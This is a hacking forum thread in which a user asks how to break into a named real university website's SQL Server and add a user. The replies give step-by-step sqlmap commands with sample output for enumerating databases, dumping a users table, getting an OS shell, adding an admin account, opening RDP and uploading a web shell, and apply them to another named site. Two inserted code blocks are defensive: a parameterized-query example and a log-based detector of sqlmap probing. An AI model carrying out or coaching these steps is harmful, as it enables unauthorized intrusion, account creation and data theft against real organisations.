asked in Hacking by

I found some databases on a website, which are as follows:

web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
available databases [17]:
[*] Admission
[*] LIVE_AIOU
[*] master
[*] model
[*] msdb
[*] OBJ
[*] Online-Admission
[*] Pictures
[*] Queries
[*] ReportServer
[*] ReportServerTempDB
[*] Rollnoslips
[*] STATS
[*] tempdb
[*] Tutor_List
[*] Tutors
[*] UMC

Now I would like to know which database is connected to the webpage (www.aiou.edu.pk/Tutorship.asp).

And how will I hack or edit the database, if I want to add a user to the database?

related to an answer for: How to hack DBMS Sql server 2008?
closed with the note: answer selected
commented by

.:: Educational Purpose Only ::.

What is sqlmap?

Sqlmap is one of the most popular and powerful SQL injection automation tools out there. Given a vulnerable HTTP request URL, sqlmap can exploit the remote database and do a lot of hacking, like extracting database names, tables, columns, all the data in the tables, etc. It can even read and write files on the remote file system under certain conditions. Written in Python, it is one of the most powerful hacking tools out there. Sqlmap is the Metasploit of SQL injections.

Vulnerable URL:

http://www.site.com/section.php?id=51
and it is prone to SQL injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the URL
http://www.site.com/section.php?id=51'
Hacking with sqlmap
In the console, try this:
sqlmap -u http://site.com/index.asp?id=765

Discover Databases

Once sqlmap confirms that a remote URL is vulnerable to SQL injection and is exploitable, the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.

$ sqlmap -u "http://www.sitemap.com/section.php?id=51" --dbs

And the result should be:

[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: mywebdb
available databases [2]:
[*] information_schema
[*] mywebdb

Find tables in a particular database

Now it's time to find out what tables exist in a particular database. Let's say the database of interest here is 'mywebdb'.

sqlmap -u "http://www.site.com/section.php?id=51" --tables -D mywebdb
And the output can be something similar to this:
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
........... more tables

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Let's say the table is 'users' and it contains the username and password.

sqlmap -u "http://www.site.com/section.php?id=51" --columns -D mywebdb -T users

The output can be something like this:

[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text

.......

[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+
So now the columns are clearly visible. Good job!

Get data from a table

Now comes the most interesting part: extracting the data from the table. The command would be:

sqlmap -u "http://www.site.com/section.php?id=51" --dump -D mywebdb -T users
The above command will simply dump the data of the particular table, very much like the mysqldump command.
The output might look similar to this:
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
OK, we did it.
Now you are asking how you will get the exact vulnerable "id=" parameter. Yeah, scan that site in some automated scanner; if it detects a SQL injection error then you will get a vulnerable link. Try on that; I hope this might be enough.
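As an added illustration (not part of the tutorial above): the two ways a page can handle the id parameter that the tutorial probes with id=51', concatenating it into the SQL text, which leaks a database error, versus validating and binding it, which does not. An in-memory sqlite3 database is used as a constructed stand-in for the site's DBMS.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the site's database: sqlite3 in memory here, but
    the concatenation flaw behaves the same way on MySQL or SQL Server."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE section (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO section VALUES (?, ?)", [(51, "public"), (52, "internal")])
    return con

def lookup_concat(con, raw_id):
    """The pattern the tutorial exploits: the raw id value is pasted into the
    SQL text, so a stray quote changes the statement instead of the data."""
    sql = "SELECT title FROM section WHERE id = " + raw_id
    try:
        return {"rows": [r[0] for r in con.execute(sql)], "error": None}
    except sqlite3.OperationalError as exc:
        # Classic ASP pages often echo this message in their HTTP 500 page; that
        # visible error is exactly what the id=51' probe is looking for.
        return {"rows": [], "error": str(exc)}

def lookup_param(con, raw_id):
    """Hardened form: check the type, then bind the value as a parameter so the
    client's input can only ever be compared as an integer, never parsed as SQL."""
    try:
        sec_id = int(raw_id)
    except ValueError:
        return {"rows": [], "error": None}   # reject quietly, no database error to leak
    rows = con.execute("SELECT title FROM section WHERE id = ?", (sec_id,))
    return {"rows": [r[0] for r in rows], "error": None}

def demo():
    """Run both handlers against the normal request and the tutorial's probe."""
    con = make_db()
    return {
        "concat_51": lookup_concat(con, "51"),
        "concat_51_quote": lookup_concat(con, "51'"),
        "param_51": lookup_param(con, "51"),
        "param_51_quote": lookup_param(con, "51'"),
    }
```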

1 Answer

Best answer

That query has already been answered: the --current-db switch in sqlmap, or the select db_name() query.

How to Hack a server through its DB, a.k.a. pwnage

Well, first of all, edit your question and hide the website address, as we do not promote unauthorized hacking (it's baaad).

As you shared a Windows server, although you did not share the connected user, I assume it's a SYSTEM account, which means that it has admin rights on the server, so there is nothing hard now, is it?

Just use the --os-shell switch in sqlmap to get yourself a command console; from there you can add a new user with admin rights, check if RDP is open, and if not, open that, or even spawn a PowerShell (refer to my PowerShell archive hacks and techniques).

--os-shell: sqlmap will try to get the operating system command shell by exploiting SQL injection

With the above you can wreak havoc.

Play Safe
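An added example from the defending side (not from the answer above): a small Python detector that reads constructed IIS W3C log lines and flags clients that look like the sqlmap probing described in this thread, by the sqlmap user-agent, quotes or comment sequences in the query string, SQL Server names such as db_name() that its enumeration and --is-dba checks use, and repeated 500 responses. Field names follow IIS's #Fields line; the log lines themselves are constructed for the demo.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not from the page); "+" stands for a space.
SAMPLE_LOG = """#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2013-05-01 12:13:00 GET /section.asp id=51 203.0.113.7 Mozilla/5.0 200
2013-05-01 12:13:01 GET /section.asp id=51%27 203.0.113.7 Mozilla/5.0 500
2013-05-01 12:13:02 GET /section.asp id=51+AND+db_name()%3E0 203.0.113.7 sqlmap/1.0-dev+(http://sqlmap.org) 500
2013-05-01 12:13:03 GET /section.asp id=52 198.51.100.9 Mozilla/5.0 200
"""
# SQL Server names seen in sqlmap fingerprint/enumeration queries (db_name() is
# the one this thread mentions; the others are its usual companions).
MSSQL_ENUM = re.compile(r"(?i)\b(db_name|is_srvrolemember|xp_cmdshell|sysobjects|information_schema)\b")
QUOTE_OR_COMMENT = re.compile(r"'|--|/\*")

def parse_w3c(text):
    """Yield one dict per request, keyed by the names from the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def classify(entry):
    """Return the reasons one request looks like SQL injection probing."""
    reasons = []
    query = unquote_plus(entry.get("cs-uri-query", "-"))
    if "sqlmap" in entry.get("cs(User-Agent)", "").lower():
        reasons.append("sqlmap user-agent")
    if QUOTE_OR_COMMENT.search(query):
        reasons.append("quote/comment in query string")
    if MSSQL_ENUM.search(query):
        reasons.append("mssql enumeration keyword")
    return reasons

def analyze(text, error_threshold=2):
    """Map each suspicious client IP to a sorted list of reasons."""
    reasons, errors = defaultdict(set), Counter()
    for e in parse_w3c(text):
        reasons[e["c-ip"]].update(classify(e))
        if e["sc-status"].startswith("5"):
            errors[e["c-ip"]] += 1   # injected syntax errors usually surface as 500s
    report = {}
    for ip in set(reasons) | set(errors):
        flags = set(reasons[ip])
        if errors[ip] >= error_threshold:
            flags.add("repeated 5xx responses")
        if flags:
            report[ip] = sorted(flags)
    return report
```

Pointing analyze() at a real IIS log directory and alerting on any client with two or more reasons is a reasonable first triage rule; tune the 5xx threshold to the site's normal error rate.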

commented by
I give you just an example, dear, like http://site.com << your target site, /file.php << vulnerable location, ?id=1 << vulnerable number

Now let me explain it to you.

./sqlmap.py -u www.drhack.net/contactus.asp?aid=120, that's all the vulnerable path, and now comes --current-user, which means the current aid --is-dba; in full, you have to use it like this:

./sqlmap.py -u www.drhack.net/contactus.asp?aid=120 --current-user --is-dba

If it gives current user is DBA: true, then you can upload a web shell on that server or site.

But you have to put the correct path which is vulnerable to a SQL error; if it's not vulnerable then you can't do anything, dear.
commented by
When I type ./sqlmap.py ........ it says no file or directory found; it seems that ./sqlmap.py is not installed??
commented by
How will I come to know which page.asp is linked/connected with which database? I want to add some data details in site.com/page.asp?id=555
So what will I do first to log in to the database? Which thing will allow me to log in to the database, and where can I add my own data in a specific id to edit or add?
commented by
When you type ./sqlmap.py it says no file, OK,

go for => sqlmap -u http://site.com/page.asp?aid=434 --dbs << try this; if it worked then try --current-user --is-dba
If you want to know which page.asp is linked/connected with the database then scan the full site or server on your b0x. Now lemme explain the full tut to you.
commented by
Can you give me your e-mail ID where I can send you all the output data/details?